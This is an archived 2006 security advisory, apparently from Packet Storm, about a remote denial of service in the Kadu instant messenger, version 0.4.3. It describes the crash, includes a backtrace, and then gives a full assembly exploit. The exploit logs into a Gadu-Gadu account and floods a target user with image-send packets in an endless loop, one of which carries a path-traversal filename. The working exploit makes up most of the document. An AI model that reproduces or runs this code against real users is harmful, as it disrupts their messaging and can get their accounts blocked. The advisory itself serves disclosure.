what you don't know can hurt you

kadu-fun.txt

kadu-fun.txt
Posted Feb 17, 2006
Authored by Piotr Bania | Site piotrbania.com

When Kadu receives large number of image send requests from an attacker it crashes. POC included.

tags | exploit
MD5 | dc00a0f29d5f803409a3e1183ba1680a

kadu-fun.txt

Change Mirror Download


Kadu Remote Denial Of Service Fun
by Piotr Bania <bania.piotr@gmail.com>
http://www.piotrbania.com
All rights reserved.


Original location: http://www.piotrbania.com/all/adv/kadu-fun.txt

Severity: Medium - remote denial of service.


Software affected: Tested on Kadu 0.4.3, others maybe also
affected.



0. DISCLAIMER

Author takes no responsibility for any actions with provided informations or
codes. The copyright for any material created by the author is reserved. Any
duplication of codes or texts provided here in electronic or printed
publications is not permitted without the author's agreement.

I. BACKGROUND

Kadu is a dynamically evolving instant messenger compatible with the Gadu-Gadu
protocol. It can be run on all platforms supporting the Qt toolkit
(except Windows) - from www.kadu.net.


II. DESCRIPTION

The problem takes place when Kadu receives large number of image send requests,
of course the main restriction here is the fact attacker must be added to victims
user list.

When such scenario occurs Kadu dies within the SIGPIPE signal, here is a little
back trace from GDB:

gdb) bt
#0 0xffffe410 in ?? ()
#1 0xbff3c238 in ?? ()
#2 0x0000001e in ?? ()
#3 0x0851d620 in ?? ()
#4 0xb7ec050b in __write_nocancel () from /lib/tls/i686/cmov/libpthread.so.0
#5 0x081a70f3 in gg_write ()
#6 0x081a75ed in gg_send_packet ()
#7 0x081a8050 in gg_image_request ()
#8 0x080f9e8a in GaduProtocol::sendImageRequest ()
#9 0x0813a27a in formatGGMessage ()
#10 0x080fdb43 in GaduProtocol::messageReceived ()
#11 0x08174267 in GaduProtocol::qt_invoke ()
#12 0xb79eb929 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3
#13 0x081715f3 in GaduSocketNotifiers::messageReceived ()
#14 0x080fe257 in GaduSocketNotifiers::socketEvent ()
#15 0x080f918e in GaduSocketNotifiers::dataReceived ()
#16 0x08171b0b in GaduSocketNotifiers::qt_invoke ()
#17 0xb79eb929 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3
#18 0xb79ec238 in QObject::activate_signal () from /usr/lib/libqt-mt.so

Moreover probably due to the restrictions done in Gadu-Gadu servers, the
victim number is blocked (user can't send any messages) for a long
period of time. This is probably done, because everytime Kadu receives
the send image requests, it responds to the attacker with image request packet.
This action is probably detected by filters on Gadu-Gadu servers and the
number is blocked.


I would also like to add I'm really new on *nix based systems, so some of the
following informations may be wrong :)


III. THANKS

I would like to thank Jaroslaw Biedrzycki for helping me with the linux
research.


IV. POC CODE

// --- SNIP ------------------------------------------------------------------
; Little Denial Of Service exploit for KADU, well it should also work
; for older Gadu-Gadu versions.
;
; (c) 2006 - Piotr Bania
; All rights reserved.
; http://www.piotrbania.com
;
;
; DISCLAIMER
;
; Author takes no responsibility for any actions with provided informations or
; codes. The copyright for any material created by the author is reserved. Any
; duplication of codes or texts provided here in electronic or printed
; publications is not permitted without the author's agreement.



include my_macro.inc

GG_PORT equ 8074
GG_HOST equ 217,17,41,88


GG_USER equ 111111 ; user
GG_PASS equ "haslo",0 ; haslo
GG_TARGET equ 222222 ; target





go_exploit:


call startup_gg
@debug "connected",0


mov eax,offset gg_seed
call gg_get_packet


push gg_seed
@pushsz GG_PASS
call gg_login_hash
mov dword ptr [gg_pass_hash],eax

mov ecx,gg_login_packet_size_h
mov eax,offset gg_login_packet_h
call gg_send_packet

call gg_get_packet
mov eax,gg_type
@check 9,"Error: login failed!!!!"



mov ecx,gg_new_status_packet_size_h
mov eax,offset gg_new_status_packet_h
call gg_send_packet

@debug "Connected :) Now flooding the target...",0


fuxor:
mov ecx,gg_msg_packet_size_h
mov eax,offset gg_msg_packet_h
call gg_send_packet


push 10
@callx Sleep


mov ecx,gg_msg2_packet_size_h
mov eax,offset gg_msg2_packet_h
call gg_send_packet


@callx GetTickCount ; it looks great when its pseudo randomized...

mov dword ptr [gg_img_crc],eax
mov dword ptr [gg_img2_crc],eax


push 10
@callx Sleep
jmp fuxor

exit:
push 0
@callx ExitProcess



include debug_prot.inc
include tcp.inc


; ******************************************************************************
; DATADATADATADATADATADATADATADATADATADATADATADATADATADATADATADATADATADATADATA
; ******************************************************************************


; packet 0x01 (r)
gg_seed dd 0

; packet gg login60 (s)
gg_login_packet_h: dd 15h
dd gg_login_packet_size
gg_login_packet:
dd GG_USER
gg_pass_hash dd 0
dd 02 ; dostepny
dd 20h ; gg version
db 0
db 31,33,3,7
dw 66
db 31,33,3,7
dw 66
db 255
db 0beh
db 0
db 0
gg_login_packet_size =$-offset gg_login_packet
gg_login_packet_size_h =$-offset gg_login_packet_h


gg_new_status_packet_h: dd 02h
dd gg_new_status_packet_size
gg_new_status_packet: dd 04h
db "ZUJZUJZUJZUJZUJZUJ",0
dd 0
gg_new_status_packet_size =$-offset gg_new_status_packet
gg_new_status_packet_size_h =$-offset gg_new_status_packet_h


IMG_SIZE_MAN equ 44h, 04h, 00h, 00h
IMG_CRC_MAN equ 69h, 9bh, 95h, 4bh


gg_msg_packet_h dd 0bh
dd gg_msg_packet_size
gg_msg_packet: dd GG_TARGET
rand_num dd 008e68c4h
dd 28h
db 0
db 2
dw gg_last_pack_size
gg_last_pack: dw 0 ; pozycja atrybutu w tekscie
db 80h ; atrybuty czcionki
gg_rimage: dw 0109h
gg_img_size: db IMG_SIZE_MAN
gg_img_crc: db IMG_CRC_MAN


gg_last_pack_size =$-offset gg_last_pack
gg_msg_packet_size =$-offset gg_msg_packet
gg_msg_packet_size_h =$-offset gg_msg_packet_h




comment $
44 04 00 00 - size
69 9B 95 4B - checksum
011E3B20 6E 75 5F 74 65 78 74 2E 67 69 66 00 47 49 46 38 nu_text.gif.GIF8
$

gg_msg2_packet_h dd 0bh
dd gg_msg2_packet_size
gg_msg2_packet: dd GG_TARGET
dd 0
db 04h,00,00,00
db 00
db 05h
gg_img2_size: db IMG_SIZE_MAN
gg_img2_crc: db IMG_CRC_MAN
db "/../../../../../../../../../../../tmp/AAAAAAAAAAAAAAAAAAAAA.gif"
db ".gif",0
include gg_sniff/plik.inc
db 0
gg_msg2_packet_size =$-offset gg_msg2_packet
gg_msg2_packet_size_h =$-offset gg_msg2_packet_h






gg_server_reply: msg_status dd 0
msg_recipient dd 0
msg_seq dd 0

dd 0


gg_img_reply: img_sender dd 0
img_seq dd 0
img_time dd 0
img_class dd 0
img_flag db 0
img_size dd 0
img_crc dd 0




; ******************************************************************************
; SOME MAIN PROCEDURES
; ******************************************************************************


gg_login_hash proc
pushad

push ebp
mov ebp,esp
add ebp,PUSHA_STRUCT_SIZE
push esi
push edi
mov edi,dword ptr [ebp+8]
mov eax,dword ptr [ebp+0Ch]
xor esi,esi
mov cl,byte ptr [edi]
test cl,cl
je xl2
push ebx
xl1: movsx ecx,cl
and esi,0FFFFFF00h
or esi,ecx
mov ecx,20h
mov edx,esi
xor edx,eax
add edx,esi
shl esi,8
xor edx,esi
shl esi,8
sub edx,esi
shl esi,8
xor edx,esi
mov eax,edx
mov ebx,edx
and eax,1Fh
sub ecx,eax
shr ebx,cl
mov ecx,eax
shl edx,cl
mov cl,byte ptr [edi+1]
or ebx,edx
inc edi
test cl,cl
mov eax,ebx
jne xl1
pop ecx
xl2: pop edi
pop esi
pop ebp
mov [esp+PUSHA_STRUCT._EAX],ebx
popad
ret

gg_login_hash endp


; eax=what to send / ecx=size
gg_send_packet proc
pushad
push 0
push ecx
push eax
push dword ptr [gg_sock]
@callx send
@check -1,"Error: send()"
popad
ret
gg_send_packet endp


;eax = where to store
gg_get_packet proc
pushad

push eax
push 0
push 8
push offset gg_main_packet
push dword ptr [gg_sock]
@callx recv
@check -1,"Error: gg_get_packet()! first recv()"
pop eax


cmp dword ptr [gg_len],0
jle @fakme

push 0
push dword ptr [gg_len]
push eax
push dword ptr [gg_sock]
@callx recv
@check -1,"Error: gg_get_packet()! second recv()"

@fakme:
popad
ret

gg_main_packet:
gg_type dd 0
gg_len dd 0
gg_get_packet endp






startup_gg proc

pushad

push offset WSA_Data
push 0101h
@callx WSAStartup
test eax,eax
jz _xxx1
xor eax,eax
@check 0,"Error: cannot setup wsa!"


_xxx1:
push 0
push SOCK_STREAM
push AF_INET
@callx socket
@check -1,"Error: socket()"
mov dword ptr [gg_sock],eax
mov ebx,eax

push GG_PORT
@callx htons
mov word ptr [gg_porto],ax


push 16
push offset gg_addr
push ebx
@callx connect
@check -1,"Error: cannot connect ;/"

popad
ret


gg_sock dd 0

gg_addr:
gg_proto dw AF_INET
gg_porto dw 0
gg_ip db GG_HOST
gg_s_zero db 8 dup (0)


startup_gg endp


end start
// --- SNIP ------------------------------------------------------------------


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    15 Files
  • 2
    Oct 2nd
    16 Files
  • 3
    Oct 3rd
    15 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    11 Files
  • 6
    Oct 6th
    6 Files
  • 7
    Oct 7th
    2 Files
  • 8
    Oct 8th
    1 Files
  • 9
    Oct 9th
    13 Files
  • 10
    Oct 10th
    16 Files
  • 11
    Oct 11th
    15 Files
  • 12
    Oct 12th
    23 Files
  • 13
    Oct 13th
    13 Files
  • 14
    Oct 14th
    12 Files
  • 15
    Oct 15th
    2 Files
  • 16
    Oct 16th
    16 Files
  • 17
    Oct 17th
    2 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close